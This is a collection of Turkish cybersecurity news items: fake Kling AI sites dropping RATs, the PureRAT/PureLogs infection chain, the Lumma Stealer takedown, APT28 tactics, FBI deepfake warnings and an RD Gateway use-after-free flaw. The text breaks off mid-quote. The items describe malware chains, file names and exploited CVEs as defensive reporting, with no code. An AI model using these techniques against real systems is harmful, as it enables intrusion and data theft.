
Tam işlevli PWA ile sahte uygulama mağazası simülasyonu
Saldırıda kullanılan kötü amaçlı açılış sayfasının, tam teşekküllü bir İleri Web Uygulaması (PWA) olduğu ve kullanıcıların daha uzun süre etkileşimde kalmasını sağlamak ile temel tarayıcı korumalarını aşmayı hedeflediği ifade edildi. Bu yöntemle saldırganlar, mobil cihaz kullanıcılarını tespit ederek özel olarak mobil odaklı bir saldırı düzenliyor.

Yalnızca mobilde çalışan JavaScript saldırısı
Kampanya, yalnızca mobil cihazlarda tetiklenen istemci tarafı JavaScript saldırısı olarak tanımlandı. JavaScript kodu, belirli web sitelerine enjekte edilerek çalışıyor ve Android, iOS ve iPadOS kullanıcılarını yönlendirme sayfalarına taşıyor. Bu yönlendirme sayfaları, kullanıcıları yetişkin içerikli sahte uygulamaların reklamını yapan bağlantılara ulaştırıyor.

PWA’lar yeni kimlik avı stratejilerinde kullanılıyor
PWA’lar, web teknolojileri kullanılarak geliştirilen ve kullanıcıya yerel uygulama benzeri bir deneyim sunan yapılar olmaları nedeniyle saldırganlar için cazip hale geliyor. Anand, 'PWA'ların kullanımı, saldırganların daha kalıcı kimlik avı yöntemlerini denediğini gösteriyor. Sadece mobil odaklı olmaları, birçok tespit mekanizmasından kaçmalarına olanak sağlıyor' dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kling AI üzerinden yapılan kimlik hırsızlığı
Gerçekte Çin merkezli Kuaishou Technology tarafından geliştirilen Kling AI, yapay zeka destekli bir içerik üretim platformudur ve 2025 itibarıyla 22 milyondan fazla kullanıcıya sahiptir. Ancak saldırganlar, bu popülerliğin arkasına saklanarak Kling AI'yı taklit eden sahte web siteleri (örneğin klingaimedia[.]com, klingaistudio[.]com) kurdu. Bu siteler, kullanıcılara dosya indirmelerini önerdi. İndirilen dosyalar, içinde uzaktan erişim Truva Atı (RAT) ve bilgi hırsızlarını barındıran ZIP arşivleri içeriyordu.

PureHVNC RAT ile sistemlere sızıldı
Check Point'in tespitine göre, kurbanların bilgisayarlarına indirilen yükleyici dosyalar, çeşitli güvenlik analiz araçlarını algılayabiliyor ve Windows Kayıt Defteri üzerinde değişiklik yaparak sistemde kalıcılığını sağlıyor. Ayrıca meşru sistem süreçlerine sızarak, PureHVNC RAT adlı ikinci aşama zararlı yazılımı aktive ediyor. Bu yazılım, tarayıcı verilerini, kripto cüzdan bilgilerini ve ekran görüntülerini hedef alarak hassas verileri sızdırıyor.

Vietnam bağlantısı ve yaygınlaşan taktikler
Check Point araştırmacıları, sahte Kling AI sayfalarına ait en az 70 farklı tanıtım gönderisi tespit ettiklerini duyurdu. Kampanyayı yürüten kişi veya grupların kimliği netleşmemekle birlikte, deliller Vietnam merkezli siber suçlulara işaret ediyor. Bu tür grupların, daha önce de sahte yapay zeka araçları aracılığıyla kullanıcıları zararlı yazılım indirmeye teşvik ettiği biliniyor.

Sosyal medya tabanlı saldırılar yükselişte
The Wall Street Journal’a göre, Meta platformlarında son dönemde büyük bir dolandırıcılık artışı yaşanıyor. Facebook ve Instagram, romantik dolandırıcılıklardan sahte promosyonlara kadar çeşitli siber suçlara ev sahipliği yapıyor. Ayrıca, Telegram ve benzeri platformlar üzerinden yayılan sahte iş ilanları, genç bireyleri Güneydoğu Asya’daki dolandırıcılık ağlarına yönlendirmek için kullanılıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kimlik Avı Saldırıları Neden Hâlâ Bu Kadar Tehlikeli?
Günümüzde tek bir dikkatle hazırlanmış e-posta, tüm bir sistemin güvenliğini tehlikeye atabiliyor. Kurumsal e-posta filtrelerini aşabilen bu iletiler, çalışanları kandırarak saldırganlara sistemlere erişim sağlayabiliyor. Özellikle Tycoon2FA gibi gelişmiş kimlik avı araçları, otomatik analiz çözümleriyle tespit edilmesi zor hale gelmiş durumda.

İlk Adım: Şüpheli Ögeleri Sandbox Ortamında İncelemek
SOC (Güvenlik Operasyon Merkezi) ekipleri, şüpheli dosya veya URL’leri ANY.RUN gibi etkileşimli sanal alan ortamlarına yükleyerek analiz gerçekleştirebiliyor. Bu tür sanal makineler, dosyaların açılmasını, bağlantıların tıklanmasını ve davranışların gözlemlenmesini güvenli şekilde sağlıyor. ANY.RUN, bu analizleri dakikalar içinde tamamlayabiliyor.

Gerçek Bir Örnek: Tycoon2FA E-postasıyla Yapılan Saldırı
Analiz edilen örnek e-posta, kullanıcıyı kandırmak amacıyla içine büyük, yeşil bir ‘Ses Çal’ butonu yerleştirilmiş bir tasarım içeriyor. Butona tıklanması, kullanıcıyı CAPTCHA’lı başka sayfalara yönlendiriyor. Bu aşamada birçok otomatik sistem devre dışı kalıyor. Ancak ANY.RUN ortamında manuel veya otomatik CAPTCHA çözümü ile analiz devam ettirilebiliyor ve nihai hedef olan sahte Microsoft giriş ekranına ulaşılabiliyor.

İkinci Adım: Tüm Saldırı Zincirini Görselleştirmek
Etkileşimli analiz sayesinde saldırının her aşaması detaylı şekilde izlenebiliyor. Şüpheli yönlendirmeler, kimlik avı ekranları ve kullanıcı davranışlarını taklit eden mekanizmalar açıkça gözlemlenebiliyor. Otomatik araçların kaçırabileceği ipuçları — örneğin eksik favicon, alakasız URL yapısı — manuel analizle ortaya çıkarılıyor.

Üçüncü Adım: IOC’leri Toplamak ve Güvenliği Güçlendirmek
Tamamlanan analiz sonrasında elde edilen IOC’ler (kompromize göstergeleri), tehdit önleme sistemlerine entegre edilebiliyor. ANY.RUN aracı, zararlı süreçleri, şüpheli ağ bağlantılarını, IP’leri ve domainleri anında işaretleyerek kapsamlı bir rapor oluşturuyor. Bu veriler hem mevcut saldırıya karşı hem de gelecekteki tehditlere karşı kullanılabiliyor.

Etkileşimli Sandbox Kullanmanın Kurumsal Faydaları
Etkileşimli sanal alan çözümleri, yalnızca deneyimli güvenlik ekipleri için değil, yeni başlayan analistler için de uygun bir analiz ortamı sunuyor. Eğitim, olay yanıtı, tehdit tespiti ve işbirliği açısından birçok avantaj sağlıyor. Bulut tabanlı yapısı sayesinde altyapı kurulumu gerektirmeyen sistem, her yerden analiz yapılmasına imkân tanıyor.

Özel Kampanya Duyurusu
ANY.RUN, 19-31 Mayıs 2025 tarihleri arasında 9. kuruluş yılını özel kampanyalarla kutluyor. Sandbox lisansları, tehdit istihbarat araçları ve eğitim laboratuvarları için geçerli tekliflerle kurumlar, analiz kapasitelerini artırabilecek.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı zinciri nasıl ilerliyor?
Kampanya, kullanıcılara gönderilen bir e-postada, RAR arşivi gibi görünen ve çift uzantı taşıyan ("doc_054_[düzenlendi].pdf.rar") dosyalarla başlıyor. Arşiv dosyasının içindeki zararlı yazılım, çalıştırıldığında kendisini Windows sistem dizinine 'task.exe' adıyla kopyalıyor ve otomatik çalıştırma için 'Task.vbs' adında bir script oluşturuyor.

Bu süreçte 'task.exe', bir diğer çalıştırılabilir dosya olan 'ckcfb.exe'yi aktive ediyor ve ardından 'InstallUtil.exe' isimli sistem yardımcı programını devreye alarak zararlı modülü enjekte ediyor. 'Ckcfb.exe', içerisinde PureRAT zararlısının ana yükünü taşıyan 'Spydgozoi.dll' adlı DLL dosyasını çıkarıyor ve sistem üzerinde kontrol kuruyor.

Kontrol sunucusuna veri aktarımı
PureRAT, uzaktaki komut ve kontrol (C2) sunucusuyla SSL üzerinden bağlantı kuruyor. Sistemde kurulu antivirüs programları, bilgisayar adı ve sistemin çalışma süresi gibi detayları toplayarak sunucuya iletiyor. Bu sayede sunucu, sisteme çeşitli zararlı komutlar gönderebiliyor.

Kullanılan modüller arasında kendini silme, sistemi yeniden başlatma, açık pencere başlıklarına göre izleme yapma, yetkisiz para transferlerini tetikleme ve panodaki kripto cüzdan adreslerini değiştirme gibi yetenekler bulunuyor.

PureLogs ile bilgi hırsızlığı
Saldırganlar, PureRAT ile birlikte PureLogs adlı bir bilgi hırsızı modülünü de kullanıyor. Bu modül, web tarayıcıları, e-posta istemcileri, parola yöneticileri, kripto cüzdanlar ve FTP yazılımları gibi çok sayıda uygulamadan veri toplayabiliyor.

StilKrip ve Ttcxxewxtly.exe zinciri
PureCrypter olarak bilinen "StilKrip.exe" adlı indirici yazılım da saldırılarda kullanılıyor. Bu yazılım, "Bghwwhmlr.wav" adında bir dosya indirerek zincirin sonraki adımlarını başlatıyor. Nihayetinde, "Ttcxxewxtly.exe" adlı yürütülebilir dosya ile PureLogs yükleniyor.

Kaspersky, PureRAT ve PureLogs'un birlikte kullanımının, saldırganlara hedef sistem üzerinde tam yetki sağladığını ve hassas kurumsal verilerin tehlikeye girmesine neden olduğunu belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

400 binden fazla cihaz hedef alındı
Lumma Stealer, dünya çapında yaklaşık 400.000 Windows cihazına bulaşarak yaygın kimlik hırsızlığı ve dolandırıcılık faaliyetlerine aracılık etti. Araç; kimlik avı e-postaları, kötü amaçlı reklamlar ve sahte yükleyiciler yoluyla yayılıyordu. Hatta bu yılın başlarında bir kampanyada saldırganlar, Booking.com’un taklidiyle kullanıcıları zararlı dosyaları indirmeye yönlendirmişti.

2.300’den fazla alan adı ele geçirildi
Microsoft’un Dijital Suçlar Birimi (DCU) tarafından yürütülen çalışma sonucunda, Lumma Stealer ile ilişkili 2.300’den fazla alan adı ele geçirildi. ABD'nin Georgia eyaletindeki Kuzey Bölge Mahkemesi’nden alınan karar doğrultusunda yapılan bu müdahaleyle, kötü yazılımın komuta ve kontrol altyapısı devre dışı bırakıldı. Ele geçirilen alan adları, şu anda Microsoft’un kontrolündeki sunuculara yönlendirilmiş durumda.

Lumma Stealer 'abonelik' modeliyle satıldı
Lumma, yalnızca bir kötü yazılım değil, aynı zamanda ticari bir yapıydı. Farklı abonelik paketleriyle satışa sunulan yazılım, temel sürümü için 250 dolardan, tüm kaynak koduna erişim için 20.000 dolara kadar fiyatlandırılıyordu. Yazılımın geliştiricisi olduğu bilinen ve “Shamel” takma adını kullanan kişi, 2023 yılında verdiği bir röportajda 400 aktif müşterisi olduğunu iddia etmişti.

Uluslararası iş birliği vurgusu
Operasyona destek veren kuruluşlar arasında ESET, Cloudflare, Lumen, CleanDNS, BitSight ve GMO Registry gibi önemli siber güvenlik firmaları da yer aldı. Black Duck firmasında görev yapan Altyapı Güvenliği Direktörü Thomas Richards, 'Kolluk kuvvetleri ve özel sektör iş birliğinin ne kadar etkili olabileceğini gösteren bir örnek' değerlendirmesinde bulundu.

Siber tehditler devam ediyor
Uzmanlara göre Lumma operasyonunun başarılı olması, kötü amaçlı yazılımlara karşı savaşın kazanıldığı anlamına gelmiyor. Microsoft, kullanıcıları e-posta eklerine karşı dikkatli olmaya, güvenilir antivirüs çözümleri kullanmaya, sistem güncellemelerini ihmal etmemeye ve çok faktörlü kimlik doğrulamayı etkinleştirmeye çağırdı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hedefte NATO üyeleri ve lojistik zinciri var
Avustralya, Kanada, Çekya, Danimarka, Estonya, Fransa, Almanya, Hollanda, Polonya, Birleşik Krallık ve ABD gibi ülkelerin resmi kurumları tarafından yayımlanan ortak uyarıya göre, APT28 özellikle savunma, ulaştırma, denizcilik, hava trafiği yönetimi ve bilgi teknolojileri alanlarında faaliyet gösteren kuruluşları hedef aldı. Etkilenen ülkeler arasında Bulgaristan, Yunanistan, İtalya, Moldova, Romanya, Slovakya ve Ukrayna da bulunuyor.

Saldırı yöntemleri: E-posta açıklarından VPN zafiyetlerine kadar
Kampanyada kullanılan yöntemler arasında parola püskürtme, hedefli kimlik avı saldırıları, Microsoft Exchange sistemlerinde posta kutusu izinlerinin değiştirilmesi, Outlook ve Roundcube gibi e-posta servislerindeki güvenlik açıklarının istismarı öne çıkıyor. Ayrıca kurumsal VPN sistemlerine yönelik SQL enjeksiyonu saldırıları da dikkat çekiyor. Özellikle CVE-2023-23397 ve CVE-2023-38831 gibi kritik zafiyetler üzerinden erişim sağlanıyor.

Tehdit sonrası faaliyetler daha tehlikeli
Saldırganlar sisteme giriş yaptıktan sonra, ulaşım koordinasyonundan sorumlu personeli ve mağdur kuruluşlarla işbirliği yapan şirketleri belirlemeye yönelik keşif çalışmaları yapıyor. İç ağlarda yanal hareket sağlamak için Impacket, PsExec ve RDP gibi araçlar, Active Directory’den bilgi sızdırmak içinse Certipy ve ADExplorer.exe kullanılıyor. Ayrıca Office 365 kullanıcı listelerini çıkarmak ve sürekli e-posta takibi için posta kutusu izinleri manipüle ediliyor.

Fransa ve ESET’ten ayrı ayrı uyarılar geldi
Fransa Dışişleri Bakanlığı, APT28’i 2021’den bu yana ülkenin çeşitli kurumlarına yönelik istikrarsızlaştırıcı siber saldırılar düzenlemekle suçlamıştı. Öte yandan ESET tarafından geçtiğimiz hafta duyurulan Operation RoundPress kapsamında, grup Roundcube, Horde ve Zimbra gibi e-posta servislerini kullanarak Doğu Avrupa, Afrika ve Güney Amerika’daki hükümetleri hedef alıyor.

Gözler internet kameralarında
Ajanslara göre, Rus askeri istihbarat biriminin hedefleri yalnızca dijital sistemlerle sınırlı değil. Ukrayna sınır kapılarındaki internet bağlantılı kameralar da bu izleme faaliyetlerinin bir parçası olarak hedef alınıyor. HeadLace, MASEPIE, OCEANMAP ve STEELHOOK gibi kötü amaçlı yazılım aileleriyle veri sızdırma faaliyetlerinin sürdüğü, verilerin PowerShell komutları ve IMAP protokolü aracılığıyla aktarıldığı bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dijital Verilerin Arasındaki Gerçeği Aramak
Günümüz dünyasında neredeyse her olayın izi dijital ortamda bir şekilde saklanıyor. Metin mesajları, e-postalar, sosyal medya hareketleri, silinmiş dosyalar… Her biri, çözülmesi gereken bir bilmecenin parçası olabilir. İşte bu noktada devreye dijital adli bilişim giriyor.

Dijital Adli Bilişim Nedir?
Dijital adli bilişim, elektronik cihazlardan veri toplama, bu verileri analiz etme ve gerektiğinde yasal süreçlerde kullanılabilecek şekilde raporlama sürecidir. Bilgisayarlar, cep telefonları, sabit diskler, bulut depoları ve sosyal medya hesapları gibi dijital kaynaklar analiz edilir. Sadece görünen veriler değil; silinmiş mesajlar, geçmiş konum verileri, tarayıcı geçmişleri ve gizlenmiş dosyalar da bu kapsamda incelenir. Amaç, bu dijital ipuçlarını delil niteliğinde kullanmaktır.

Özel Dedektiflerin Yeni Yüzü
Geçmişin trençkotlu, kamera taşıyan dedektiflerinin yerini artık ekran başında çalışan, karmaşık veri analizleri yapan profesyoneller aldı. Bugünün özel dedektifleri; hukuka uygun şekilde hareket eder, detaylı döküm hazırlar, çevrimiçi davranışları takip eder ve büyük resme odaklanır. Geleneksel kolluk kuvvetlerinden farklı olarak birebir çalışırlar; aldatma vakalarından iş yerindeki veri sızıntılarına, çevrimiçi tehditlerden sahte profillere kadar çok sayıda konuda hizmet verirler.

Dijital Adli İncelemelerin Kullanıldığı Başlıca Alanlar
Bu tür tekniklerin kullanıldığı bazı yaygın senaryolar şunlardır:

• İlişki ve Aile Davaları: Aldatma şüphesi, gizli hesaplar, çocukların dijital güvenliği.

• İşyeri İncelemeleri: Gizli veri sızıntıları, şirket cihazlarının kötüye kullanımı.

• Siber Suçlar: Sahte sosyal medya hesapları, tehdit mesajları, dijital takip.

• Boşanma Süreçleri: Gizlenmiş banka hesapları, maddi varlıkların tespiti.

Bu tür durumlarda dijital veriler, şüpheleri doğrulayan sessiz tanıklar gibidir.

Kullandıkları Araçlar ve Teknikler
Özel dedektiflerin dijital adli incelemelerde kullandığı bazı başlıca araçlar şunlardır:

• GPS takip kayıtları

• Sosyal medya analiz araçları

• Adli görüntüleme yazılımları

• Silinmiş dosya kurtarma programları

• Anahtar kelime tarama sistemleri
  Bazı uzmanlar yapay zeka destekli yüz tanıma yazılımları ya da deepfake analiz sistemleri de kullanabilir. Ancak bu araçlar doğru şekilde kullanılmadığında hukuki geçerliliğini yitirebilir.

Adım Adım Dijital Adli Soruşturma Süreci
Bir dijital adli inceleme süreci genellikle şu adımlarla ilerler:

1. İlk danışma: Olay hakkında bilgi toplanır ve hedefler belirlenir.

2. Cihazların temini: İlgili cihazlara yasal izinle erişim sağlanır.

3. Veri yedekleme: Orijinal veriye zarar verilmeden birebir kopyalar alınır.

4. Analiz: Mesajlar, geçmiş kayıtları, silinmiş içerikler ve daha fazlası incelenir.

5. Raporlama: Tüm bulgular zaman damgası ve görsellerle birlikte rapor haline getirilir.

Yasal Sınırlar İçinde Kalmak Neden Önemli?
Bu alanda çalışan uzmanlar, yasal sınırların dışına çıkmadan veri toplamaya özen gösterir. Özel dedektifler; kişisel gizlilik yasalarına uyar, cihazlara yalnızca yazılı izinle erişir, yetkisiz takip veya dinleme işlemlerinden kaçınır ve her adımı belgelendirir. Aksi halde elde edilen veriler hem geçersiz sayılır hem de yasal sorun doğurabilir.

Neden Profesyonel Yardım Şart?
Her ne kadar teknolojiye hakim bireyler kendi araştırmalarını yapabileceğini düşünse de, dijital adli bilişim uzmanları hem teknik bilgiye hem de hukuk bilgisine sahiptir. Bilgilerin yanlışlıkla silinmesi, sürecin geçersiz hale gelmesi gibi riskleri ortadan kaldırırlar. Bu nedenle özel dedektif desteği, çoğu zaman sürecin güvenli ve yasal şekilde yürütülmesini sağlar.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hedef: Şifreler, kripto paralar ve kişisel bilgiler
ABD Adalet Bakanlığı tarafından yapılan açıklamada, Lumma gibi kötü amaçlı yazılımların milyonlarca kullanıcının oturum bilgilerini çalarak banka dolandırıcılığı ve kripto para hırsızlığı gibi suçlarda kullanıldığı belirtildi. Sadece FBI, Lumma yazılımının 10 milyondan fazla enfeksiyona neden olduğunu tespit etti.

Microsoft 394 binden fazla bulaşma tespit etti
Europol, 16 Mart ile 16 Mayıs 2025 tarihleri arasında Microsoft’un dünya genelinde 394.000 Windows bilgisayarın Lumma ile enfekte olduğunu belirlediğini aktardı. Operasyonun, kötü amaçlı yazılım ile kullanıcılar arasındaki iletişimi tamamen kestiği vurgulandı. Lumma, Europol tarafından ‘dünyanın en büyük bilgi çalan yazılım tehdidi’ olarak tanımlandı.

Arkasındaki isim: 'Shamel'
Microsoft Dijital Suçlar Birimi (DCU), ESET, BitSight, Lumen, Cloudflare, CleanDNS ve GMO Registry gibi firmalarla iş birliği yaptı. Lumma’nın geliştiricisinin 'Shamel' takma adını kullanan Rus bir kişi olduğu, Telegram gibi platformlarda yazılımı farklı seviyelerde hizmet paketleriyle pazarladığı tespit edildi. Yazılımın fiyatları 250 dolardan başlayıp 20.000 dolara kadar çıkıyor. En pahalı paket, kaynak kod erişimi ve yeniden satış hakkı sunuyor.

Sürekli evrilen altyapı ve gizlenme teknikleri
ESET, yazılımın farklı kullanıcılar için özelleştirilebilir yapıda olduğunu, gelişmiş tespit önleme sistemlerine ve sahte yazılım paketleriyle yayılma stratejilerine sahip olduğunu belirtti. Lumma, genellikle sahte yazılım indirme siteleri, tıklama tuzakları ve reklam ağları aracılığıyla yayılıyor. Microsoft, yazılımın yayılmasında Prometheus gibi trafik dağıtım sistemlerinin kullanıldığını da açıkladı.

Cloudflare: İş yapamaz hale geldiler
Cloudflare, kötü niyetli alan adlarına bir uyarı sayfası yerleştirildiğini ve bu alan adlarını kontrol eden hesaplara karşı da işlem başlatıldığını açıkladı. Cloudforce One yetkilisi Blake Darché, yapılan müdahaleyle Lumma operatörlerinin para kazanma yeteneklerinin engellendiğini ve operasyonlarının ciddi şekilde sekteye uğratıldığını ifade etti.

Geri dönmeleri muhtemel
Uzmanlar, Lumma operasyonunun büyük oranda sekteye uğratıldığını ancak tehdit aktörlerinin taktik değiştirerek yeniden faaliyet göstermeye çalışacaklarını belirtiyor. Lumma geliştiricisi Ocak 2025’te yaptığı açıklamada, sonbaharda operasyonlarını sonlandırmayı planladıklarını belirtmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Manuel süreçler güvenlik zaafı yaratıyor
Kurumlar, kimlik güvenliği konusunda kâğıt üzerinde yeterli görünse de gerçekler farklı. Çok faktörlü kimlik doğrulama (MFA) etkinleştirme, şifrelerin güvenli biçimde saklanması ve eski çalışanların sistemden çıkarılması gibi işlemlerin büyük bölümü hâlâ manuel olarak yürütülüyor. Cerby'nin araştırmasına göre, yalnızca %4’lük bir kesim bu süreçleri tamamen otomatikleştirebildi.

İnsan hatası en büyük risklerden biri olmaya devam ediyor
Verizon’un 2025 Veri İhlali Raporu'na göre, güvenlik ihlallerinin %60'ında insan faktörü yer aldı. Cerby’nin verileri de bu tabloyu destekliyor: Şirketlerin %41’i şifreleri hâlâ e-posta ve elektronik tablolar gibi güvenli olmayan yöntemlerle güncelliyor. %89’luk kesim ise MFA işlemlerini kullanıcıların manuel olarak devreye almasını bekliyor. Bu da saldırganlar için ciddi bir açık anlamına geliyor.

Erişim yönetimi hâlâ manuel ilerliyor
Şirketlerin %59’u, kullanıcı erişimlerinin başlatılması ve sonlandırılması işlemlerini manuel olarak sürdürüyor. Bu da biletleme sistemlerine ya da sözlü takiplere dayanarak ilerleyen yavaş, dağınık ve güvenlik açıklarına açık bir yapı oluşturuyor. Ponemon Enstitüsü'nün verilerine göre, şirketlerin %52’si manuel işlemler nedeniyle güvenlik ihlali yaşadı.

Otomasyon açığı neden kapanmıyor?
Araştırmaya göre, uygulama yığını hızla büyürken altyapı dağınık kaldı. Şirketlerin kullandığı birçok uygulama, modern kimlik standartlarıyla entegre olamıyor. Bu da geçici çözümler ve manuel müdahaleleri kalıcı hale getiriyor. Parola yöneticileri ve komut dosyaları gibi araçlar ise sürdürülebilir olmaktan uzak.

Yapay zekâ destekli çözümler kapıda
Cerby, otomasyon açığını kapatmak için yapay zekâ destekli hibrit çözümler öneriyor. Güvenlik liderlerinin %78’i yapay zekânın tüm süreci tek başına devralmasına henüz güvenmese de %45’i insan destekli otomasyon modelini benimsiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

AirBorne açığı nedir?
Yapılan araştırmada, 'AirBorne' adı verilen bu açıkların hem Apple’ın AirPlay sisteminde hem de üçüncü taraf cihazların AirPlay uyumlu hale gelmesini sağlayan yazılım geliştirme kitinde (SDK) yer aldığı belirtildi. Söz konusu açıklar, hackerların aynı Wi-Fi ağına bağlı cihazlara uzaktan erişmesini sağlıyor.

Test saldırısı: Hoparlöre erişim sağlandı
Oligo araştırmacıları, AirPlay destekli bir Bose hoparlöre uzaktan erişim sağlayarak sistemdeki açıklardan nasıl yararlanılabileceğini gösterdi. Uzak kod yürütme (RCE) saldırısı ile hoparlörün ekranına 'AirBorne' logosu yerleştirildi.

Mikrofonlu cihazlar casusluk tehdidiyle karşı karşıya
Güvenlik firması, bu açıkların özellikle mikrofon bulunan cihazlarda casusluk amacıyla kullanılabileceğini belirtti. Oligo'nun CTO’su Gal Elbaz, Wired'a yaptığı açıklamada milyonlarca cihazın bu açıklardan etkilenebileceğini ifade etti.

Apple ve CarPlay açıklaması
Apple ise yaptığı açıklamada, söz konusu güvenlik zafiyetlerinin etkisinin 'sınırlı' olduğunu savundu. Ancak araştırmacılar, benzer risklerin CarPlay destekli sistemlerde de bulunduğunu, özellikle tahmin edilebilir ya da bilinen Wi-Fi şifreleri kullanıldığında tehlikenin arttığını bildirdi.

Kullanıcılara öneri: Özelliği devre dışı bırakın
Uzmanlar, AirPlay özelliğini kullanmayan kullanıcıların güvenlik riski yaşamamak adına bu özelliği cihaz ayarlarından devre dışı bırakmasını tavsiye ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kaynak: CUMHA - CUMHUR HABER AJANSI

Üst düzey yetkililer taklit ediliyor
Duyuruda, siber suçluların hem federal hem de eyalet düzeyindeki mevcut ya da eski üst düzey hükümet yetkililerini veya onların yakın çevresini taklit ettiği belirtildi. Bu kişilerin adları ve görselleri, güvenilirlik hissi yaratmak amacıyla deepfake ve GenAI teknolojileriyle sahte sesli ve yazılı mesajlara dönüştürülüyor.

Smishing ve vishing saldırılarında artış
FBI, dolandırıcıların smishing (SMS ile kimlik avı) ve vishing (sesli kimlik avı) yöntemleriyle insanları hedef aldığına dikkat çekti. Bu tür saldırıların amacı, kullanıcıları ikincil bir mesajlaşma platformuna yönlendirerek kötü amaçlı yazılım bulaştırmak ya da değerli kişisel bilgileri ele geçirmek olarak tanımlandı.

Vatandaşlara güvenlik önerileri
FBI, dolandırıcılık girişimlerine karşı vatandaşlara çeşitli güvenlik önerilerinde bulundu. Bu kapsamda, özellikle üst düzey bir kişiden geldiği iddia edilen mesajların gerçekliğinin sorgulanması, sesli mesajların tonlama ve kelime seçimi açısından dikkatlice incelenmesi gerektiği vurgulandı.

Ünlü isimler de hedefte
Uyarıda, Elon Musk gibi kamuoyunda tanınan isimlerin de bu tür sahte içeriklerde sıkça kullanıldığı ifade edildi. Yapay zeka tabanlı teknolojilerin yaygınlaşması, dolandırıcıların ikna edici içerikler üretmesini kolaylaştırırken, kullanıcıların bu konuda daha bilinçli olması gerektiği belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Smishing ve vishing saldırıları artışta
Söz konusu saldırılarda, SMS (smishing) ve sesli arama (vishing) yoluyla kullanıcıların güvenini kazanarak hassas verileri ele geçirmeye çalışıldığı bildirildi. FBI, bu yöntemlerin özellikle insanların duygularını hedef alarak hızlı ve düşünmeden karar vermelerine neden olduğunu vurguladı.

Sesli mesajlar tehlike taşıyor
FBI, tehdit aktörlerinin özellikle güvenilir ses ve metin mesajları oluşturmak için yapay zeka ve deepfake teknolojilerinden faydalandığını, çoğu durumda mevcut ve eski üst düzey yetkililer veya onların bağlantılarının taklit edildiğini aktardı.

Güvenlik için öneriler
FBI açıklamasında, "Üst düzey bir ABD yetkilisinden geldiğini iddia eden bir mesaj alırsanız, bunun gerçek olduğunu varsaymayın." uyarısında bulundu. Ayrıca kimlik doğrulaması yapılmadan mesajlara itibar edilmemesi gerektiği, ses tonu ve kelime seçimlerindeki tutarsızlıkların dikkatle incelenmesi gerektiği ifade edildi.

Ünlüler de hedefte
Üretken yapay zeka ve deepfake teknolojilerinin yaygınlaşmasıyla birlikte dolandırıcılık olaylarının arttığına dikkat çekilirken, Elon Musk gibi kamuya mal olmuş kişilerin dahi sıkça taklit edildiği belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber suçlulara hizmet sunuyorlardı
Söz konusu platformların çalınan verilerin paylaşımı, kara para aklama hizmetleri ve telekomünikasyon altyapısı temini gibi yasa dışı faaliyetlerde kullanıldığı açıklandı. Blockchain analiz şirketi Elliptic’e göre bu operasyon, çevrimiçi dolandırıcılık faaliyetlerini önemli ölçüde sekteye uğratacak.

ABD, Huione Group'u hedef aldı
Huione Guarantee platformunun sahibi olan Huione Group, ABD Hazine Bakanlığı tarafından suç örgütlerine destek vermekle suçlandı. Şirketin, Kuzey Kore’nin siber soygunlarından 37 milyon dolar, dolandırıcılık olarak bilinen ‘domuz kesimi’ yönteminden ise 36 milyon doları akladığı öne sürüldü. Bu gelişmelerin ardından şirketin ABD finans sistemine erişimi engellendi.

Telegram sözcüsünden açıklama
Kapatılan hesaplar ve yasaklanan platformlar hakkında konuşan bir Telegram sözcüsü, Reuters’a yaptığı açıklamada ‘Dolandırıcılık veya kara para aklama gibi suç faaliyetlerinin hizmet şartları tarafından yasaklandığını ve keşfedildiğinde her zaman kaldırıldığını’ ifade etti. Telegram daha önce de binlerce kripto para dolandırıcılığı hesabını platformdan kaldırmıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kuantum teknolojilerinin siber güvenlikteki rolü artıyor
Kuantum bilişimdeki hızlı ilerleme, klasik şifreleme sistemlerinin güvenliğini tehdit ediyor. Yeni geliştirilen kuantum kriptografi sistemi, özellikle güçlü kuantum bilgisayarların ileride oluşturabileceği şifre kırma tehditlerine karşı veri güvenliğini sağlamak amacıyla tasarlandı.

QKD ve PQC teknolojileri tek sistemde birleşti
Yeni sistem, Kuantum Anahtar Dağıtımı (QKD) ve Kuantum Sonrası Kriptografi (PQC) teknolojilerini bir araya getirerek siber güvenlikte çığır açıyor. QKD, şifreleme anahtarlarını fiziksel kuantum prensiplerine dayalı olarak güvenli biçimde iletirken; PQC, geleneksel algoritmaların kuantum bilgisayarlarca kırılmasını önlemek için gelişmiş matematiksel yöntemler kullanıyor.

China Telecom’dan iki yeni kuantum güvenlik ürünü daha
China Telecom, kuantum şifreli telefon sistemine ek olarak iki yeni ürün tanıttı. Bunlardan ilki, kuantum güvenli taşıyıcı sınıfı anlık mesajlaşma platformu olan Quantum Secret; diğeri ise finansal denetim ve iş akış yönetimi için geliştirilen Quantum Cloud Seal platformu oldu. Her iki ürün de Çin’in kuantum teknolojileri konusundaki stratejik kararlılığını ortaya koyuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Teknik detaylar ve saldırı vektörü
Söz konusu açık, aaedge.dll bileşeninde yer alan CTsgMsgServer::GetCTsgMsgServerInstance fonksiyonunda tespit edilen bir use-after-free (UAF) hatasından kaynaklanıyor. RD Gateway başlatılırken birden fazla iş parçacığının (thread) eşzamanlı olarak bu fonksiyona erişmesi, senkronizasyon eksikliği nedeniyle m_pMsgSvrInstance işaretçisinin hatalı biçimde yeniden yazılmasına yol açıyor. Bu durum bellek bozulmasına neden olurken, saldırganların bu süreci manipüle ederek uzaktan kod çalıştırmasını mümkün kılıyor.

Ebubekir Bastama: 'Sunucu kontrolü saldırganın eline geçebilir'
Siber güvenlik araştırmacısı Ebubekir Bastama, söz konusu güvenlik açığının ciddiyetine dikkat çekerek şu ifadeleri kullandı:
